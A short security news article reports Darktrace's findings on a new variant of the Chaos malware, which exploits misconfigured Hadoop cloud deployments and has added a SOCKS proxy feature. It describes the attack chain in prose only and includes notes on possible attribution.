A new variant of malware known as Chaos has been identified, with a focus on exploiting misconfigured cloud deployments. This development represents an expansion of the malware’s targeting capabilities beyond its original focus on routers and edge devices, as noted in a report by Darktrace.
Overview of Chaos Malware
First documented by Lumen Black Lotus Labs in September 2022, Chaos is a cross-platform malware that can operate in both Windows and Linux environments. Its functionalities include executing remote shell commands, deploying additional modules, propagating to other hosts through brute-forcing SSH keys, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks using various protocols such as HTTP, TLS, TCP, UDP, and WebSocket.
New Targeting Tactics
The latest variant was detected by Darktrace targeting a honeypot network, specifically a misconfigured Hadoop instance that allowed for remote code execution. The attack began with an HTTP request designed to create a new application, which embedded shell commands to retrieve a Chaos agent binary from an attacker-controlled server. This binary was then executed with permissions set to allow all users to read, modify, or run it, followed by the deletion of the binary to obscure the attack.
Changes in Malware Functionality
This updated version of Chaos has removed certain functions that previously enabled it to spread via SSH and exploit router vulnerabilities. Instead, it now includes a new SOCKS proxy feature, which allows compromised systems to relay traffic, obscuring the origins of malicious activities and complicating detection efforts for defenders. Darktrace indicated that this evolution may reflect the threat actors’ intent to broaden their monetization strategies beyond just cryptocurrency mining and DDoS-for-hire services.
Context and Implications
While the specific actors behind this malware remain unconfirmed, the presence of Chinese language characters and infrastructure suggests a possible connection to Chinese cybercriminals. The domain used in the attack has previously been associated with phishing campaigns linked to the Chinese cybercrime group Silver Fox. The ongoing evolution of Chaos malware underscores the persistent efforts of cybercriminals to enhance their botnets and expand their operational capabilities.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.
